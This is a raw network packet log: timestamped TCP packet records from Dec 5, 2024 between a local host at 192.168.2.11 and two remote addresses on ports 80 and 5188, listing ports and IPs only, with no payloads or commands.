Dec 5, 2024 17:32:16.653179884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.653223038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.653934002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.654586077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.654634953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.654886961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.654901981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.654932022 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.654958963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.655881882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.656068087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.656124115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.656788111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.656843901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.657023907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.657068014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.657753944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.657965899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.658015013 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.658570051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.658607006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.658607960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.658646107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.659502983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.659535885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.659540892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.659569025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.660445929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.660672903 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.660715103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.661382914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.661422014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.661578894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.661609888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.662368059 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.662384033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.662440062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.663237095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.663496017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.663548946 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.664170980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.664217949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.664671898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.664717913 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.665102005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.665148020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.665705919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.666053057 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.666531086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.666546106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.666570902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.666594982 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.666958094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.667001963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.667042971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.667944908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.667968035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.667988062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.668009043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.668833017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.668971062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.669007063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.669825077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.670069933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.670109034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.671356916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.671392918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.671458006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.671489954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.671942949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.671977043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.672003984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.672033072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.672729015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.672765017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.672812939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.672842979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.673862934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.673902035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.673929930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.674005985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.674818993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.674874067 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.674886942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.674916029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.675498009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.675543070 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.675555944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.675585032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.676282883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.676330090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.676340103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.676368952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.677192926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.677252054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.677360058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.677391052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.678570986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.678827047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.678879976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.679111004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.679155111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.679172039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.679203033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.680011988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.680061102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.680066109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.680089951 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.680924892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.680974960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.681058884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.681101084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.681889057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.682018995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.682063103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.682822943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.682869911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.683022976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.683059931 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.683732986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.683778048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.683957100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.683995962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.684655905 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.684695959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.684725046 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.684752941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.685687065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.685735941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.685905933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.686645031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.686691999 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.687099934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.687148094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.687413931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.687453985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.687566042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.687598944 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.688385010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.688437939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.688528061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.688560009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.689383984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.689415932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.689419031 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.689445972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.690216064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.690396070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.690433979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.691154003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.691189051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.691220999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.691248894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.692141056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.692173958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.692193985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.692222118 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.693011999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.693056107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.693165064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.693195105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.693945885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.694190025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.694227934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.694886923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.694921970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.695462942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.695497036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.695806980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.695841074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.695858955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.695892096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.696716070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.696737051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.696749926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.696769953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.697432995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.697469950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.697534084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.697683096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.698309898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.698424101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.698458910 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.699326038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.699364901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.699636936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.699675083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.700248957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.700289011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.738127947 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.738157988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.738172054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.738214970 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.738559008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.738617897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.738637924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.738660097 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.738675117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.739461899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.739542961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.739554882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.739590883 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.740411043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.740492105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.740504980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.740530968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.740545988 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.741421938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.741444111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.741456032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.741491079 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.742351055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.742427111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.742439985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.742460012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.742475986 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.743273020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.743340015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.743351936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.743375063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.744271040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.744353056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.744365931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.744389057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.744416952 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.745398045 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.745445967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.745457888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.745484114 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.746248960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.746294975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.746306896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.746329069 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.746351004 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.747122049 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.747184038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.747195005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.747216940 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.748085022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.748146057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.748157978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.748186111 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.748203039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.749129057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.749193907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.749209881 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.749232054 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.750039101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.750148058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.750161886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.750184059 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.750211000 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.793766022 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.798238039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:16.843934059 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.843954086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.843990088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.844029903 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.844423056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.844455004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.844701052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.844737053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.845208883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.845242977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.845365047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.845398903 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.846183062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.846230030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.846483946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.846559048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.847218037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.847265959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.847354889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.847423077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.848189116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.848239899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.848680973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.848727942 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.848998070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.849082947 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.849524021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.849567890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.849894047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.849929094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.850056887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.850087881 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.850872993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.850923061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.851125956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.851340055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.851737022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.851783037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.851996899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.852313042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.852674007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.852720022 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.853110075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.853301048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.853646994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.853701115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.854214907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.854260921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.854528904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.854582071 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.854746103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.854975939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.855472088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.855521917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.855984926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.856056929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.856430054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.856442928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.856465101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.856482983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.857315063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.857707024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.857745886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.857825041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.858370066 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.858409882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.858431101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.858459949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.859322071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.859486103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.859669924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.859700918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.860842943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.860862970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.860882998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.860903978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.861526012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.861764908 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.861901999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.861952066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.862377882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.862517118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.862579107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.863173962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.863223076 CET	49793	80	192.168.2.11	185.215.113.84
